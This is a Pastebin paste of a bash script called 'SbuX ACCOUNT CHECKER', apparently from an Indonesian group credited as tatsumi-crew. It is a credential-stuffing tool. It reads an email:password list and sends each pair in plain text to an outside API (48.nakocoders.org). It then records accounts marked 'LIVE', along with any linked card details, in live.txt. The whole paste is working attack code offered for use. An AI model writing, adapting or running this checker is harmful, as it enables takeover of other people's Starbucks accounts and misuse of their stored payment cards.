Jemb0t_IR3eng

sbux

Mar 31st, 2019
169
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.84 KB | None | 0 0
  1. #!/bin/bash
  2. #issued on : 17 agustus 2018
  3. #coded By Arvan Apriyana
  4. waktu=$(date '+%Y-%m-%d %H:%M:%S')
  5. RED="\e[31m"
  6. GREEN="\e[32m"
  7. YELLOW="\e[33m"
  8. CYAN="\e[36m"
  9. LIGHTGREEN="\e[92m"
  10. MARGENTA="\e[35m"
  11. BLUE="\e[34m"
  12. BOLD="\e[1m"
  13. NOCOLOR="\e[0m"
  14. header(){
  15. printf "${GREEN}
  16. ####################################
  17. ####################################
  18. ####### #######
  19. ####### #######
  20. ####### #######
  21. ############### ###############
  22. ############### ###############
  23. ############### ###############
  24. ############### ###############${RED}
  25. ####### #### #### #######
  26. ####### #### #### #######
  27. ####### ############## #######
  28. ####### ############## #######
  29. ####### #######
  30. ####################################
  31. ####################################s${NOCOLOR}
  32. ------------------------------------
  33. SbuX ACCOUNT CHECKER
  34. Code By: Arvan Apriyana
  35. www.tatsumi-crew.net
  36. ------------------------------------
  37. "
  38. }
  39. tatsumi(){
  40. ua=$(cat ua.txt | sort -R | head -1)
  41. curlnya=$(curl -s "http://48.nakocoders.org/api/sbux/api.php?emailna=$1&passwordna=$2" -L)
  42. livena=$(echo $curlnya | grep -Po '(?<="msg":)[^,]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{\|}\)//g')
  43. cards=$(echo $curlnya | grep -Po '(?<=card : )[^<span]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{\|}\)//g')
  44. status=$(echo $curlnya | grep -Po '(?<="#FF0000\"> )[^<]*')
  45. status1=$(echo $curlnya | grep -Po '(?<=#FF0000"> )[^<]*')
  46. status2=$(echo $curlnya | grep -Po '(?<=FF0000"> )[^<]*')
  47. if [[ ! $livena =~ "Account Die" ]]; then
  48. printf "${GREEN}[LIVE] $1|$2 [Card:$cards] $status $status2 $status3 [$waktu]\n";
  49. echo "[LIVE] $1|$2 [Point:$kontenID] [$waktu]" >> live.txt
  50. printf "${NORMAL}"
  51. else
  52. printf "${RED}[DIE] $1|$2 [$waktu]\n";
  53. printf "${NORMAL}"
  54. fi
  55. }
  56. header
  57. echo ""
  58. echo "List In This Directory : "
  59. ls
  60. echo "Delimeter list -> email:password"
  61. echo -n "Masukan File List : "
  62. read list
  63. if [ ! -f $list ]; then
  64. echo "$list No Such File"
  65. exit
  66. fi
  67. persend=1
  68. setleep=3
  69.  
  70. itung=1
  71.  
  72. x=$(gawk -F: '{ print $1 }' $list)
  73. y=$(gawk -F: '{ print $2 }' $list)
  74. IFS=$'\r\n' GLOBIGNORE='*' command eval 'emailgblg=($x)'
  75. IFS=$'\r\n' GLOBIGNORE='*' command eval 'passwordna=($y)'
  76. for (( i = 0; i < "${#emailgblg[@]}"; i++ )); do
  77. set_kirik=$(expr $itung % $persend)
  78. if [[ $set_kirik == 0 && $itung > 0 ]]; then
  79. sleep $setleep
  80. fi
  81. emailna="${emailgblg[$i]}"
  82. kontol="${passwordna[$i]}"
  83. tatsumi $emailna $kontol &
  84. itung=$[$itung+1]
  85. done
Add Comment
Please, Sign In to add comment